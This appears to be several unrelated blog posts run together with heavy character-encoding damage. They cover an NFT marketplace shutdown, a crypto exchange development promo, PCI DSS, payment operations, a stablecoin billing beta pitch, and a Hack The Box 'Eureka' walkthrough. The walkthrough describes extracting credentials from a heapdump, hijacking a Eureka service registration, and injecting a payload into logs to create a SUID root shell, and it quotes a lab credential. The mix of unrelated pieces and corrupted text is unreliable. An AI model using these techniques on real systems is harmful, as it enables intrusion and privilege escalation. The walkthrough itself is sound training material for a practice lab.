Nifty Gateway, the marketplace that once helped bring NFT drops to a wider audience, will stop running its marketplace on February 23, 2026. The company put the site into a withdrawal-only mode the same day it made the announcement, and users were told they must move any remaining funds and NFTs off the platform before that date.
Withdrawal Window Opens
According to the company, withdrawal tools are available now. Reports note users can pull USD or ETH balances through a linked Gemini Exchange account or send funds to their bank via Stripe.
Emails with step-by-step instructions will be sent to account holders, and a shutdown notice already appears on the Nifty Gateway homepage. The aim, as described by the owner, is to let people retrieve what they own before the platform goes dark.
Today, we are announcing that the Nifty Gateway platform will be closing on February 23, 2026. Starting today, Nifty Gateway is in withdrawal-only mode.
Nifty Gateway was launched in 2020 with the vision of revolutionizing digital art. Since launching, Nifty supported dozens ofβ¦
Based on reports from Gemini, the closure is meant to let the parent firm concentrate on building one bigger app for customers. The move highlights how interest and trading activity in many NFT markets have cooled from the highs seen in earlier years.
Some collectors and artists are left scrambling to rehome items they once sold or stored on Nifty Gateway.
End Of An Early Player
Nifty Gateway helped make buying NFTs easier for people who preferred credit cards and familiar checkout flows. It launched as a high-profile marketplace and hosted major drops from well-known creators.
The platform supported hundreds of millions in sales at its peak and played a clear part in bringing NFT art into mainstream headlines. Its exit marks the end of an important chapter for that wave of marketplaces.
What Owners Must Do Now
Owners should check their inboxes for the official instructions, confirm where their tokens are stored, and move assets before the deadline. If NFTs are stored in custodial wallets on the site, they will need to be transferred out.
USD and ETH balances should be withdrawn or moved into a connected Gemini account if that option suits the owner. Waiting past the closure date will reduce options.
A Quiet Turning Point
For many collectors, this will feel like another sign that the early boom years have passed. For creators, the change raises questions about where drops and secondary sales will happen next.
Gemini says it will keep supporting NFTs through its other products, including the Gemini Wallet, but the specific ways that creators and buyers reconnect with those audiences will depend on new tools and services that arrive in the next months.
Featured image from Unsplash, chart from TradingView
Cryptocurrency exchanges are the backbone of the digital asset economy. They enable users to buy, sell, and trade cryptocurrencies securely while supporting liquidity, price discovery, and marketΒ growth.
As the crypto market continues to mature, businesses entering this space or scaling existing platforms must make one critical decision earlyΒ on:
Choosing the right cryptocurrency exchange development company.
Image is created byΒ ChatGPT
The wrong partner can lead to security gaps, scalability issues, regulatory trouble, and delayed launches. The right one accelerates time-to-market, ensures compliance, and builds long-term competitive advantage.
This guide explores what to look for in a crypto exchange development company and why ITIO Innovex is a preferred choice for businesses worldwide.
Understanding Cryptocurrency Exchange Development Services
Cryptocurrency exchange development services involve building, customizing, and deploying secure platforms that allow users to trade digital assets efficiently.
These services typically include:
Core Features of Cryptocurrency Exchange Development
1. Scalable Platform Architecture
A well-designed exchange must handle high transaction volumes while maintaining performance, uptime, and data integrity. Scalability is critical for futureΒ growth.
2. User Interface (UI) & User Experience (UX)
An intuitive, trader-friendly interface improves adoption, reduces friction, and enhances retention especially for first-time users.
3. High-Performance TradingΒ Engine
The trading engine is the heart of the exchange. It mustΒ support:
Fast orderΒ matching
Multiple orderΒ types
Real-time priceΒ updates
High concurrency
Security & Compliance: Non-Negotiables in Crypto Exchange Development
1. Advanced SecurityΒ Measures
A reliable exchange integrates:
Multi-factor authentication (MFA)
End-to-end encryption
Cold and hot wallet architecture
DDoS protection and monitoring
2. Regulatory Compliance
Adherence to global standards suchΒ as:
AML (Anti-Money Laundering)
KYC (Know Your Customer)
is essential for legal operation and long-term trust.
π Thinking of Launching a Crypto Exchange? PauseΒ Here
Before investing heavily, a short technical review can save months of rework and costly mistakes.
Letβs build a secure, scalable, and future-ready crypto trading platform together.
Conclusion
Choosing the best cryptocurrency exchange development company is a strategic decision that directly impacts security, scalability, and long-term success.
By evaluating experience, customization capabilities, compliance readiness, and technical support, businesses can avoid costly missteps. ITIO Innovex delivers all of this making it a reliable partner for cryptocurrency exchange development in todayβs fast-evolving digital asset landscape.
In an era where digital payments dominate everyday transactionsβββfrom online shopping and mobile wallets to contactless in-store purchasesβββthe security of cardholder data has never been more critical. The Payment Card Industry Data Security Standard (PCI DSS) stands as the global benchmark for protecting sensitive payment information. Developed by the PCI Security Standards Council (PCI SSC), it applies to any organization that processes, stores, or transmits credit or debit cardΒ data.
Generative AI
1. Exploding Cyber Threats and DataΒ Breaches
Cyberattacks targeting payment systems have surged. Ransomware, phishing, supply-chain exploits, and advanced persistent threats (APTs) are common. Non-compliant businesses face higher breach risksβββstudies show compliant organizations experience up to 50% fewer incidents. A single breach can expose thousands of card records, leading to massive fraud and identity theft. PCI DSS enforces controls like encryption, access restrictions, and vulnerability management to minimize theseΒ risks.
2. Building and Maintaining CustomerΒ Trust
Consumers now prioritize security when choosing where to shop. A visible commitment to PCI DSS signals reliabilityβββthink βYour card details are safe with us.β In contrast, a breach erodes trust overnight, resulting in lost customers, negative reviews, and long-term reputational damage. Compliant businesses often see higher conversion rates and loyalty because customers feel protected.
3. Avoiding Severe Financial and Legal Penalties
Non-compliance carries heavyΒ costs:
Fines from card brands (up to $100,000+ per month in severeΒ cases)
Increased transaction fees
Liability for fraud losses and breach-related expenses (legal fees, notifications, credit monitoring)
Potential loss of payment processing privileges
With stricter enforcement under v4.0.1βββincluding mandatory MFA for admin access, enhanced password policies, anti-phishing measures, and continuous monitoringβββregulators and acquirers are less tolerant ofΒ lapses.
4. Enabling Secure Digital Innovation
Modern businesses rely on cloud services, APIs, e-commerce platforms, and third-party processors. PCI DSS v4.0.1 introduces flexibility (e.g., customized approaches and targeted risk analysis) while raising the bar on emerging risks like payment page skimming and insecure authentication. Compliance helps organizations innovate safelyβββadopting new tech without exposing cardΒ data.
5. A Foundation for Broader Cybersecurity Maturity
PCI DSS isnβt just about cardsβββits 12 core requirements (build and maintain secure networks, protect cardholder data, maintain vulnerability management, etc.) strengthen overall security posture. Many organizations use it as a baseline for GDPR, HIPAA, or ISO 27001 alignment.
Bottom Line inΒ 2026
In a world of nonstop digital transactions and sophisticated cybercriminals, PCI DSS compliance protects customers, safeguards revenue, and demonstrates responsibility. Itβs no longer a βcheckboxββββitβs a strategic imperative for any business handling payments.
If your organization processes card data, assess your current status against v4.0.1 requirements today. Non-compliance risks far outweigh the effort of achieving it.
What challenges have you faced with PCI DSS? Share in the commentsβββIβd love to discuss real-world tips!
I work in payment infrastructure, and I keep seeing the same pattern across startups, marketplaces, and PSP-style builds.
Teams spend weeks perfecting checkout.
Then they get blindsided by payouts, disputes, mismatched balances, and βwhy didnβt I get paid?βΒ emails.
Not because the payment gateway failed. But because KYB β risk β routing β settlement β reconciliation was treated like a straightΒ line.
It isnβt.
Itβs a system one that has to stay consistent when real money, real merchants, refunds, chargebacks, delayed webhooks, and regulatory scrutiny enter theΒ picture.
If youβre building any of the following, this applies directly toΒ you:
A marketplace (split payouts, vendor settlements)
A SaaS product (subscriptions, prorations, refunds)
Even a spreadsheet-driven exception queue is betterΒ than
βWeβll figure it outΒ later.β
Later is expensive.
5. Routing Without Monitoring Becomes Expensive
Routing can improve approvals and reduce cost- but only if you monitorΒ it.
Every week, you should be able toΒ answer:
Which route is degrading?
Where are declines increasing?
Which region or MCC isΒ risky?
What changed after the lastΒ release?
Track these weekly (even in GoogleΒ Sheets):
Approval rate
Decline reason distribution
Dispute rate
Refund rate
Settlement delayΒ rate
Reconciliation exception rate
Ten minutes of review here saves months of cleanupΒ later.
A 10-Minute Sanity Check for Your KYB β Settlement System
If youβre building payouts or payment rails, answer these honestly:
Do we have merchant tiers with rules perΒ tier?
Can we pause or hold payouts based on risk triggers?
Do we have a dispute workflow (evidence, deadlines, owner)?
Are payout rules clearly documented?
Can we reconcile settlement files to internalΒ states?
Do we review approvals, declines, and disputesΒ weekly?
If you answered βnoβ to two or more, your product may work today- but youβre likely accumulating operational debt that becomes very expensive later.
Why Iβm SharingΒ This
Most payment content focuses on APIs and integrations.
But the hard part is keeping money movement and operational truth aligned- consistently, under pressure, atΒ scale.
These are the lessons teams usually learn after a painful incident. Iβm sharing them so fewer teams haveΒ to.
I keep a one-page KYB β Settlement scorecard I use to sanity-check paymentΒ setups.
If you want it, commentΒ with:
What youβre building (marketplace / SaaS / PSP / cryptoΒ rails)
Your biggest headache (onboarding, disputes, payout delays, reconciliation, declines)
Iβll reply with the scorecard and the top 2β3 gaps to fix first for yourΒ model.
If enough people ask, Iβll publish the scorecard as a follow-up post.
Over the past three weeks, Iβve sent 50+ emails to Nigerian businessesβββfashion designers in Lagos, freelance developers, gadget retailers, drone wholesalers, and crowdfunding platforms.
The feedback has been surprisingly consistent.
These arenβt isolated complaints. Theyβre systemic infrastructure gaps.
The pattern isΒ clear:
Businesses are losing 10β15% to international paymentΒ fees
Freelancers are watching Naira devaluation eat their savings in real-time
E-commerce businesses are dealing with failed cross-border transactions
Operations teams face manual reconciliation nightmares
Thereβs constant fear of frozen accounts when accepting international payments
Traditional payment rails werenβt built for this moment. Banks canβt solve it. Payment processors wonβt solve it. Someone has to create the alternative.
BillingBase is non-custodial crypto billing infrastructure for global businesses.
Let me break down what that actuallyΒ means:
Non-custodial means payments go directly to YOUR wallet. We never hold your funds. We donβt control your money. We donβt have the ability to freeze your account. You maintain complete custody while we handle the infrastructure.
Crypto billing infrastructure means we provide the payment primitives youβre already familiar withβββcheckout links, subscriptions, refunds, webhooks, invoicingβββexcept they work with stablecoins instead of traditional paymentΒ rails.
For Nigerian businesses, this means we understand the specific problems you face: Naira devaluation, international payment friction, high platform fees, and the need for dollar-denominated earnings that hold theirΒ value.
Hereβs what you can do with BillingBase:
Accept stablecoin payments: USDT, USDC, DAI, and CNGN (Naira-pegged)
Use familiar tools: Payment links, recurring subscriptions, one-time payments, refunds, webhooks, and a dashboard to track everything
Get built-in protection: Chainalysis wallet screening, transaction-level risk checks, KYB verification, and audit trails for compliance
Why Weβre Starting with aΒ Beta
We donβt have all the answersΒ yet.
What weΒ know:
Nigerian businesses need better cross-border payments. Naira devaluation makes dollar earnings critical. Platform fees (Upworkβs 15%, Stripeβs 3.9%, PayPalβs conversion markups) are too high. International customers increasingly pay with stablecoins. Operations teams need reconciliation tools that traditional banks donβtΒ provide.
What we need to validate:
Core features: Which payment primitives matter most? Do fashion designers prioritize deposit handling or subscription billing? Do freelancers want simple payment links or full API integration? Whereβs the acceptable onboarding friction threshold?
Compliance: What documentation feels reasonable versus invasive? KYB is necessary, but whereβs the line between thorough and annoying?
Infrastructure: Which blockchainsβββBase (lowest fees), Polygon (widely supported), Arbitrum (fast settlement)? Do businesses care, or just want βcheapest and fastestβ? USDC (dollar-pegged) or CNGN (Naira-pegged)?
Integrations: QuickBooks? Xero? Google Sheets? Slack notifications when paymentsΒ arrive?
Questions only real usage canΒ answer:
How do designers handle deposits versus final payments?
Do freelancers prefer shareable links or automated invoicing? What reporting do finance teamsΒ need?
How often do merchants convert stablecoins toΒ Naira?
Whatβs the right balance between automated risk controls and merchantΒ control?
We canβt answer these in a vacuum. We need real businesses using BillingBase with real customers.
Weβre looking for specific businesses where stablecoin payments solve real problems.
1. SME Businesses with Global Clients Fashion designers, bridal boutiques, custom clothiers, bespoke service providers with international clients who ship worldwide or provide remote services.
Your pain: 3β7 day payment delays, high cross-border fees, difficult deposit handling, currency conversion losses.
What you get: Instant stablecoin settlement, payment links for deposits/finals, dollar-denominated earnings, free integrated website duringΒ beta.
2. Freelancers & Service Providers Developers, designers, consultants, educators working directly with clients or through Upwork/Fiverr/Toptal.
Your pain: 10β15% platform fees, poor PayPal conversion rates, dollar invoices settled in devalued Naira, no professional low-cost direct paymentΒ option.
What you get:0.5% transaction fees, payment link dashboard, dollar earnings protected from devaluation, automatic receipts and auditΒ trails.
Your pain: Slow, expensive wire transfers, high cross-border fees, poor reporting, and difficulty tracking recurring contributions.
What you get: Donation links (one-time/recurring), lower fees, instant international contributions via stablecoins, and clean reporting for finance teams andΒ donors.
What weβre NOT looking forΒ (yet):
High-volume enterprises: If youβre processing 10,000 transactions per day, weβre not ready for you. Weβre optimizing for businesses with 10β500 transactions per month duringΒ beta.
Businesses requiring instant Naira conversion: We donβt provide off-ramp services yet. Youβll need your own method to convert stablecoins to Naira if needed (P2P platforms like Binance, Bybit, or local exchanges workΒ well).
Companies needing white-label solutions: If you want to rebrand BillingBase as your own product, thatβs not our focus rightΒ now.
Anyone expecting zero bugs: This is a beta. There will be rough edges. If you need production-perfect software on day one, wait for our public launch later thisΒ year.
What Beta Participants Get
1. Free Integration &Β Setup
No setup fees: Most payment platforms charge $500-$2,000 for integration. WeΒ donβt.
No monthly subscription during beta: Use BillingBase for free while weβreΒ testing.
Transaction fees waived for first 90 days (or first 100 transactions): Whichever comes first. After that, standard fees apply (0.5% or lower depending onΒ volume).
One-on-one onboarding support: Weβll walk you through wallet setup, dashboard usage, and first transactions. No βfigure it out yourselfβ documentation dumps.
2. Custom Solutions Based on Your BusinessΒ Type
For fashion designers: Weβll build you a one-pager website with integrated payment links. Free during beta. Professional design. Consultation booking system ifΒ needed.
For e-commerce businesses: Weβll integrate BillingBase API directly with your existing website. Custom checkout flow. Webhook setup. TestingΒ support.
For freelancers: Payment link dashboard optimized for invoicing. Easy sharing via email, WhatsApp, or social media. Automatic receipt generation.
For educators: Subscription billing for courses or memberships. Payment links for one-time consultations or content. Recurring payment automation.
3. Direct Access to theΒ Team
Weekly feedback calls (optional): Tell us whatβs working and whatβsΒ broken.
Slack/WhatsApp channel with founders: Direct line to Ngozi and the team. No support ticket blackΒ holes.
Priority bug fixes: If something breaks, we fix it fast. Beta participants get priority.
Your input shapes the product roadmap: Weβre not building in isolation. If you need a feature, weβll consider adding it based on beta feedback.
4. Early Mover Advantage
Lifetime discounted pricing after beta: When we launch publicly, youβll pay less than new customersβββforever.
Featured case studies (with permission): If youβre willing, weβll showcase how youβre using BillingBase. Good for your brand, good forΒ ours.
First access to new features: New integrations, reporting tools, or blockchain support? Beta participants see itΒ first.
Referral program with revenue share: Refer other businesses to BillingBase and earn a percentage of their transaction fees.
What Weβre Asking FromΒ You
This isnβt passive testing. If you just want to βtry it out and see,β thatβs not what weΒ need.
Time Commitment:
30β60 minutes: Initial setup (wallet, KYB verification, dashboard walkthrough, first test transaction)
24β48 hour response time: When we ask βCan you try this again and tell us what happened?β
5β10 minutes monthly: Survey on feature usage and painΒ points
Honesty Requirement:
We need brutal feedback, not polite validation.
Tell us whatβs confusing, broken, or doesnβt fit your workflow. Share what your customers sayβββpositive and negative. If onboarding felt complicated, the dashboard doesnβt make sense, or a feature exists but you donβt understand why youβd use it, tell us. Screenshots help. Screen recordings areΒ better.
Weβre not looking for cheerleaders. Weβre looking for honest partners whoβll tell us when weβreΒ wrong.
Real Usage:
Use this with real customers. Test transactions catch bugs, but real revenue matters more. We canβt improve what we donβt see in production.
Send a payment link to a real client. Use BillingBase for a real deposit. Integrate it and see if customers choose the crypto option. Weβre not asking you to bet your entire business on this, but we need real scenarios to see what happens when money is on theΒ line.
Patience:
There will be bugsβββweβll fix them fast. Some features wonβt exist yetβββweβre prioritizing based on feedback. Documentation might be incompleteβββweβre improving itΒ weekly.
Beta means βweβre still learning.β If you need production-perfect software on day one, wait for our publicΒ launch.
In this writeup, we will explore the βEurekaβ machine from Hack The Box, categorised as a Hard difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the βEurekaβ machine from Hack The Box by achieving the following objectives:
User Flag:
During enumeration, we discovered Spring Boot Actuator endpoints, including /actuator/heapdump, which revealed plaintext credentials for oscar190. We logged in to SSH as oscar190, but found the home directory empty. The application.properties file revealed Eureka credentials (EurekaSrvr:0scarPWDisTheB3st), which allowed us to access the Eureka dashboard on port 8761. By registering a malicious microservice, we retrieved miranda.wise credentials and captured the user flag from user.txt.
Root Flag:
For privilege escalation, the vulnerable log_analyse.sh script allowed command injection, enabling creation of a SUID bash shell in /tmp/bash. Execution of this shell provided root access, and the root flag was obtained from /root/root.txt.
Enumerating the Eureka Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap-sC-sV-oAinitial10.10.11.66
Nmap Output:
ββ[dark@parrot]β[~/Documents/htb/eureka]ββββΌ$nmap-sC-sV-oAinitial10.10.11.66# Nmap 7.94SVN scan initiated Sun Aug 24 03:30:10 2025 as: nmap -sC -sV -oA initial 10.10.11.66Nmapscanreportfor10.10.11.66Hostisup (0.046s latency).Notshown:998closedtcpports (conn-refused)PORTSTATESERVICEVERSION22/tcpopensshOpenSSH8.2p1Ubuntu4ubuntu0.12 (Ubuntu Linux; protocol2.0)| ssh-hostkey:| 3072d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)| 25690:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)|_25694:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)80/tcpopenhttpnginx1.18.0 (Ubuntu)|_http-title:Didnotfollowredirecttohttp://furni.htb/|_http-server-header:nginx/1.18.0 (Ubuntu)ServiceInfo:OS:Linux; CPE:cpe:/o:linux:linux_kernelServicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.# Nmap done at Sun Aug 24 03:30:21 2025 -- 1 IP address (1 host up) scanned in 10.99 seconds
Analysis:
Port 22 (SSH): Secure Shell service (OpenSSH 8.2p1) for remote access.
Port 80 (HTTP): Web server (nginx 1.18.0) hosting furni.htb.
Web Enumeration:
Perform web enumeration to discover potentially exploitable directories and files.
Feroxbuster directory enumeration identified the following endpoints:
Analysis:
/actuator/heapdump: Full application heap dump (very sensitive, ~76MB).
The heapdump is usually the biggest goldmine hereβit can contain hardcoded credentials, JWT secrets, API keys, or session tokens.
Web Application Exploration:
The website interface appears to be a standard design showcasing a Modern Interior Design Studio.
Create a new user account
Therefore, proceed with creating a new account using the credentials mentioned above.
The password must contain a minimum of 10 characters.
Attempted to log in with the previously created credentials, but the response only returned bad credentials with no further action.
Extracting Eureka Service Credentials from Heapdump as oscar190
Proceed to download the heapdump by directly accessing the /actuator/heapdump endpoint through the web browser
To analyze the downloaded heapdump, run the strings command and pipe the output into grep to look for potential credentials. For example, using strings heapdump.hprof | grep -i "password=" will filter for any occurrences of the keyword password= within the dump. If no useful results are found, the search can be expanded with broader patterns such as pass, user, token, secret, or key to uncover sensitive information like database passwords, API keys, or authentication tokens stored in memory. This approach provides a quick way to extract valuable data from the heapdump before performing deeper analysis with tools like Eclipse MAT.
As a result, a full port scan will identify any additional services accessible on the target system.
Attempting Access to oscar190 via Eureka Dashboard and SSH
An attempt to use the previously discovered credentials for authentication failed, with all login attempts unsuccessful.
We used pwncat-cs to test the recovered credentials against SSH. The login was successful, and we gained remote access to the target system.
Enumeration as oscar190
After gaining access, we inspected the oscar190 directory. It was empty and contained no useful files for further exploitation.
We also checked for SUID binaries on the system, but found no unusual or exploitable ones.
During enumeration, we found a notable file at ./web/Funi/src/main/resource/application.properties containing sensitive information, including credentials that revealed the password for the oscar190 user.
Most importantly, under the Eureka section you discovered:
This line shows the Eureka service uses embedded credentials:
Username:EurekaSrvr
Password:0scarPWDisTheB3st
These new credentials are different from oscar190. They may be valid for the Eureka dashboard (port 8761) or other services like SSH, MySQL, or the web portal.
Accessing Spring Eureka Dashboard on Port 8761 Using Discovered Credentials
The newly discovered credentials (EurekaSrvr:0scarPWDisTheB3st) were tested against the Eureka service endpoint. Authentication was successful, confirming valid access to the Eureka configuration interface.
Surprisingly, the credentials worked and granted access to the Spring Eureka application dashboard, confirming control over the service.
Monitoring System Activity and Command Execution with pspy64
The pspy64 output revealed that a scheduled task is being executed by the root user, which uses curl to send a POST request to http://furni.htb/login. The request is crafted to resemble a normal browser login, with headers such as Accept, Content-Type, User-Agent, and a session cookie included. Most importantly, the POST data is not hardcoded in the command but instead read from the temporary file /tmp/tmp.hJ3yAWDvEW. the file is writable or replaceable by a lower-privileged user, it may be possible to inject malicious data or commands into it, allowing code execution under rootβs context whenever the automated task runs.
Cloud-Gateway Enumeration and Insight
During enumeration, a directory named cloud-gateway was discovered, which stands out as it is not typically present in standard web application structures. Given its uncommon presence, this directory warrants deeper inspection to determine whether it contains exploitable configurations or hidden endpoints.
The cloud-gateway directory was identified within the application files, which is uncommon in typical setups and indicates the use of Spring Cloud Gateway for routing and service communication. Such directories often contain sensitive configuration files, route definitions, or embedded credentials, making it an important target for closer inspection during enumeration.
Analysing the application.yaml Configuration File
It appears that the request is being passed to the user-management-service component, located under the path /var/www/web, specifically beneath the /login functionality. This suggests that authentication requests from /login are routed internally to the user-management-service, which likely handles user validation and credential processing.
HTTP Login Endpoint Hijacking via User-Management-Service
Inside the user-management-service directory, several files and subdirectories were identified, indicating this component is likely responsible for handling authentication and account-related functionality within the application. Since it sits directly under /var/www/web, its contents may include configuration files, source code, or compiled application resources that could expose sensitive information such as database credentials, API keys, or logic flaws.
The files discovered within the user-management-service directory were copied over to the attackerβs machine for further offline analysis. This allows deeper inspection of configuration details, source code, and potential hardcoded secrets without the risk of altering the target environment.
The application.properties and Eureka-related configuration files contain fields such as <instanceId>, <hostName>, <ipAddr>, <port>, <homePageUrl>, <statusPageUrl>, and <healthCheckUrl>. By modifying these values to match the attackerβs controlled IP address and port, it is possible to redirect the service registration in Eureka to point toward a malicious service instead of the legitimate one.
Retrieving miranda.wise Credentials and Capturing User Flag
The first command performs a POST request to register a new instance of the USER-MANAGEMENT-SERVICE application, where the configuration details (such as instance ID, host, IP address, and port) are provided in an external instance.xml file. By modifying this XML file with the attackerβs own machine details, it is possible to make Eureka believe that the legitimate service now points to the attacker-controlled host. The second command issues a DELETE request targeting the existing service entry localhost:USER-MANAGEMENT-SERVICE:9009, which corresponds to the genuine application running locally on port 9009.
A successful callback was received, which revealed system details tied to the user miranda.wise. This indicates that the malicious service registration worked as intended, and the compromised microservice forwarded traffic to the attacker-controlled host, exposing valuable information about another valid user account in the environment.
The user flag was captured by reading the user.txt file with the cat command.
Escalate to Root Privileges Access
Privilege Escalation:
We did not identify any unusual or exploitable SUID binaries on the system.
A script named log_analyse.sh was discovered on the system, which stands out as a potential target for further analysis to determine if it contains insecure commands, misconfigurations, or privilege escalation opportunities.
Analysis of log_analyse.sh Script
This script is a log analyser that examines server logs to track three key aspects: whoβs logging in (successfully or not), what HTTP errors are occurring, and any system errors worth noting. Itβs got some nice touches β colour-coded outputs for quick scanning and a clean report saved to log_analysis.txt.
This Bash script analyzes log files, extracting login attempts, HTTP status codes, and errors, then saves results to log_analysis.txt. A key function, analyze_http_statuses(), parses HTTP status codes using grep -oP 'Status: \K.*'. However, itβs vulnerable to command injectionβif logs contain malicious strings like $(malicious_command), Bash will execute them when processing the file.
The output demonstrates the behavior of the log_analyse.sh script when executed, showing that it processes and reads the contents of application.log. This indicates that the scriptβs purpose is related to log handling, and analyzing its execution flow could reveal opportunities for manipulation or privilege escalation.
The original file was copied, then deleted, and after restoring it, the file ownership changed from www-data to miranda-wise.
Exploiting Bash SUID for Privilege Escalation
The bash script does not run with root privileges.
It defines two target log files located in the user-management-service and cloud-gateway directories, then injects a malicious payload into them. The payload attempts to execute a command substitution by copying /bin/bash to /tmp/bash and setting the SUID bit, effectively creating a root-privileged shell. To achieve this, the script removes the original log files and replaces them with the crafted payload. Once the vulnerable process or script that parses these logs executes the injected content, the attacker gains elevated privileges via the SUID-enabled /tmp/bash.
We then executed the crafted bash file, which replaced the targeted log files with the injected payload, preparing for privilege escalation once the vulnerable service processes the modified logs.
Running the script produced no immediate effect, suggesting the logs remained unprocessed or required additional conditions.
After some time, the injected payload successfully executed and resulted in the creation of a SUID bash binary inside the /tmp directory, allowing privilege escalation. By running ls -l /tmp/bash, the SUID bit could be confirmed, and executing /tmp/bash -p provided a root shell since the binary retains elevated privileges. From there, commands like id could be used to verify root access, and the final step was reading the root.txt file located in the /root directory to obtain the root flag and complete the exploitation.
The root flag was retrieved by executing the cat root.txt command.
Login
